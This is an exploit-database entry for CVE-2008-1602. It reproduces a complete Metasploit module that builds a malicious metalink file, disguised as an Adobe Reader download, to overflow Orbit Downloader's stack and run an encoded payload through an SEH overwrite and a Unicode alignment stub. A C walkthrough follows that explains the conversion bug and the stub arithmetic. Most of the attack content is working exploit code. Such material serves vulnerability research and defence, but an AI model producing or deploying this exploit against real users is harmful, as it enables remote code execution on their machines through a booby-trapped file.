Orbit Downloader URL Unicode Conversion Overflow

Published: 21 Feb 2012 21:36:57
Reported by: Diego Juarez, juan vazquez <[email protected]>
Type: metasploit
Source: www.rapid7.com

Stack-based buffer overflow in Orbit Downloader due to an insecure URL ASCII-to-Unicode conversion (MultiByteToWideChar), triggered by a crafted metalink file.

Related (family, reporter, title, published):
- 0day.today (zdt): Orbit Downloader URL Unicode Conversion Overflow, 23 Feb 2012
- Circl (circl): CVE-2008-1602, 23 Feb 2012
- Core Security (coresecurity): Orbit Downloader "Download failed" buffer overflow, 3 Apr 2008
- Check Point Advisories (checkpoint_advisories): Orbit Downloader Download Argument Processing Stack Buffer Overflow (CVE-2008-1602), 21 Feb 2010
- CVE (cve): CVE-2008-1602, 6 Apr 2008
- Cvelist (cvelist): CVE-2008-1602, 6 Apr 2008
- Exploit DB (exploitdb): Orbit Downloader - URL Unicode Conversion Overflow (Metasploit), 23 Feb 2012
- NVD (nvd): CVE-2008-1602, 6 Apr 2008
- Packet Storm (packetstorm): Orbit Downloader URL Unicode Conversion Overflow, 24 Feb 2012
- Prion (prion): Stack overflow, 6 Apr 2008

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Orbit Downloader URL Unicode Conversion Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow in Orbit Downloader.
        The vulnerability is due to Orbit converting a URL ASCII string to Unicode
        in an insecure way with MultiByteToWideChar.
        The vulnerability is exploited with a specially crafted metalink file that
        should be opened with Orbit through the "File->Add Metalink..." option.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Diego Juarez', # Vulnerability discovery
          'juan vazquez', # Metasploit module
        ],
      'References'     =>
        [
          [ 'BID', '28541' ],
          [ 'OSVDB', '44036' ],
          [ 'CVE', '2008-1602' ],
          [ 'URL', 'http://www.coresecurity.com/content/orbit-downloader' ],
        ],
      'Payload'        =>
        {
          'Space'       => 2000,
          'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions' => { 'BufferRegister' => 'EAX' },
          'BadChars'    => "\x00\x09\x0a\x0b\x0c\x0d\x26\x3c",
          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Orbit Downloader 6.4 on Windows XP SP3',
            {
              'Ret' => 0x4b38, # p/p/r unicode compatible from orbitdm.exe
              'Nop' => 0x46, # 004600 => add [esi+0x0],al
              'AddEax' => "\x05\x15\x11", # add eax,0x11001500
              'Offset' => 4
            }
          ],
          [ 'Orbit Downloader 6.4 on Windows 7',
            {
              'Ret' => 0x4b38, # p/p/r unicode compatible from orbitdm.exe
              'Nop' => 0x46, # 004600 => add [esi+0x0],al
              'AddEax' => "\x05\x16\x11", # add eax,0x11001600
              'Offset' => 120
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2008-04-03',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.metalink']),
      ])
  end

  def exploit

    sploit = rand_text_alpha(4096 - "http://".length)
    sploit << "\xff" * 2 # EIP =>  Access Violation
    sploit << rand_text_alpha(120) # padding
    sploit << "\x61\x62" # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200)
    sploit << [target.ret].pack("v") # seh # ppr
    sploit << target['Nop']
    sploit << target['AddEax'] # eax align is os dependant
    sploit << target['Nop']
    sploit << "\x2d\x11\x11" # sub eax,0x11001100
    sploit << target['Nop']
    sploit << "\x50" # push eax
    sploit << target['Nop']
    sploit << "\xc3" # ret
    sploit << rand_text_alpha(target['Offset']) # align shellcode to eax pointer
    sploit << payload.encoded

    metalink = %Q|
<?xml version="1.0" encoding="utf-8"?>
<metalink version="3.0" generator="Metalink Generator v1.00.0034" xmlns="http://www.metalinker.org/">
  <publisher>
    <name>Adobe</name>
    <url>http://www.adobe.com/</url>
  </publisher>
  <description>Adobe Acrobat Reader</description>
  <files>
    <file name="AdbeRdr80_en_US.exe">
      <version>8.0</version>
      <language>en-US</language>
      <os>Windows-x86</os>
      <verification>
        <hash type="md5">0ab5ce309f313ed028824251c798b35c</hash>
      </verification>
      <resources>
        <url type="http" preference="100">http://#{sploit}.com/pub/adobe/reader/win/8.x/8.0/enu/AdbeRdr80_en_US.exe</url>
      </resources>
    </file>
  </files>
</metalink>
|

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(metalink)

  end
end
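The two mechanisms the module relies on, as an added worked example in portable C (this is not code from the Metasploit module, from Orbit Downloader, or from Rapid7). `ascii_to_wide()` is a stand-in that follows the MultiByteToWideChar contract (a count of wide characters, size query with count 0, failure when the buffer is too small) so the program runs without Windows; the caller bug it exercises, passing the destination size in bytes where the API wants wide characters, is the classic way this API is misused and is assumed here for illustration, since the page only says the conversion was done "in an insecure way". `widened_add_eax_imm()` rebuilds the module's stub from the bytes on the page (nSEH `\x61\x62`, SEH `0x4b38`, `0x46` nops, the target's `AddEax` bytes, `sub eax`, `push eax`, `ret`), widens it the way the conversion does, and decodes the `add eax` operand the CPU actually sees. URL lengths, the canary value and `URL_CAP` are constructed sample inputs.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint16_t wchar16;   /* a UTF-16LE code unit, what WCHAR is on Windows */

/* Portable stand-in for MultiByteToWideChar(CP_ACP, 0, src, -1, dst, cch)
 * (assumption: this mimics the contract, it is not the Win32 call). cch counts
 * WIDE CHARACTERS. With cch == 0 it only reports the size needed, terminator
 * included; otherwise it writes nothing and returns 0 when dst is too small. */
static size_t ascii_to_wide(const char *src, wchar16 *dst, size_t cch)
{
    size_t need = strlen(src) + 1;
    if (cch == 0)
        return need;
    if (need > cch)
        return 0;                         /* ERROR_INSUFFICIENT_BUFFER */
    for (size_t i = 0; i < need; i++)
        dst[i] = (unsigned char)src[i];   /* ASCII widens 1:1, high byte 0x00 */
    return need;
}

#define URL_CAP 256                       /* wide chars reserved for the URL (constructed) */
#define CANARY  0xC0DE                    /* constructed marker for the memory behind the buffer */

/* Widens a constructed URL of url_len 'A's into a URL_CAP-slot buffer that is
 * deliberately followed by URL_CAP canary slots, so an overrun shows up as a
 * clobbered canary instead of a corrupted stack frame.
 * bytes_as_count == 1 reproduces the assumed bug: sizeof(buf) (bytes) is passed
 * where the API expects sizeof(buf) / sizeof(buf[0]) (characters), so the call
 * is allowed to write twice what fits.
 * Returns 1 if the canary was overwritten, 0 if converted within bounds,
 * -1 if the conversion was refused and nothing was written. */
static int convert_url(size_t url_len, int bytes_as_count)
{
    char url[2 * URL_CAP + 1];
    wchar16 region[2 * URL_CAP];
    wchar16 *buf = region;                /* the buffer the caller meant to use */
    wchar16 *canary = region + URL_CAP;   /* whatever lies behind it */
    size_t cch = bytes_as_count ? sizeof(wchar16) * URL_CAP : URL_CAP;

    if (url_len > 2 * URL_CAP)
        url_len = 2 * URL_CAP;
    memset(url, 'A', url_len);
    url[url_len] = '\0';
    for (size_t i = 0; i < URL_CAP; i++)
        canary[i] = CANARY;

    if (ascii_to_wide(url, buf, cch) == 0)
        return -1;
    for (size_t i = 0; i < URL_CAP; i++)
        if (canary[i] != CANARY)
            return 1;
    return 0;
}

/* The widening that turns the module's stub into what the CPU executes:
 * every byte is followed by 0x00. out must hold 2 * n bytes. */
static size_t widen_stub(const unsigned char *stub, size_t n, unsigned char *out)
{
    for (size_t i = 0; i < n; i++) {
        out[2 * i] = stub[i];
        out[2 * i + 1] = 0x00;
    }
    return 2 * n;
}

/* Builds the module's stub for one target (add_eax is that target's 3-byte
 * 'AddEax' value), widens it, and decodes the imm32 that follows the first
 * 0x05 opcode, i.e. the operand of add eax as it actually runs. */
static uint32_t widened_add_eax_imm(const unsigned char add_eax[3])
{
    unsigned char stub[16], wide[32];
    size_t n = 0;
    stub[n++] = 0x61; stub[n++] = 0x62;           /* nSEH: popad ; add [edx],ah */
    stub[n++] = 0x38; stub[n++] = 0x4b;           /* SEH: 0x4b38, the p/p/r */
    stub[n++] = 0x46;                             /* nop: add [esi],al */
    memcpy(stub + n, add_eax, 3); n += 3;         /* 05 xx yy -> add eax, imm32 */
    stub[n++] = 0x46;
    stub[n++] = 0x2d; stub[n++] = 0x11; stub[n++] = 0x11; /* sub eax,0x11001100 */
    stub[n++] = 0x46; stub[n++] = 0x50;           /* push eax */
    stub[n++] = 0x46; stub[n++] = 0xc3;           /* ret: lands in the payload */
    size_t wn = widen_stub(stub, n, wide);
    for (size_t i = 0; i + 4 < wn; i++)
        if (wide[i] == 0x05)
            return (uint32_t)wide[i + 1] | (uint32_t)wide[i + 2] << 8 |
                   (uint32_t)wide[i + 3] << 16 | (uint32_t)wide[i + 4] << 24;
    return 0;
}

/* Net EAX adjustment after the add/sub pair: how far the stub moves EAX
 * towards the encoded payload before push eax ; ret. */
static int32_t net_eax_delta(const unsigned char add_eax[3])
{
    return (int32_t)(widened_add_eax_imm(add_eax) - 0x11001100u);
}

int main(void)
{
    static const unsigned char xp[3]   = { 0x05, 0x15, 0x11 };   /* XP SP3 target */
    static const unsigned char win7[3] = { 0x05, 0x16, 0x11 };   /* Windows 7 target */
    printf("400-char URL, size in bytes: %d, size in chars: %d\n",
           convert_url(400, 1), convert_url(400, 0));
    printf("XP   add eax imm32 0x%08x, net delta 0x%x\n",
           widened_add_eax_imm(xp), (unsigned)net_eax_delta(xp));
    printf("Win7 add eax imm32 0x%08x, net delta 0x%x\n",
           widened_add_eax_imm(win7), (unsigned)net_eax_delta(win7));
    return 0;
}
```

The first check is why a 4096-byte URL matters: a count passed in bytes lets the conversion write up to twice the reserved buffer, while the same input is refused outright when the count is given in wide characters. The second shows why the module's 3-byte `AddEax` values differ per target: after widening, `\x05\x15\x11` is `add eax, 0x11001500` and `\x05\x16\x11` is `add eax, 0x11001600`, so the fixed `sub eax, 0x11001100` leaves a net +0x400 or +0x500, which together with the `Offset` padding points EAX at the Unicode-encoded payload before `push eax ; ret`.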

Scores (as of 02 Oct 2020 20:00): Vulners AI Score 0.7 (low risk); CVSS 2: 10; EPSS: 0.6749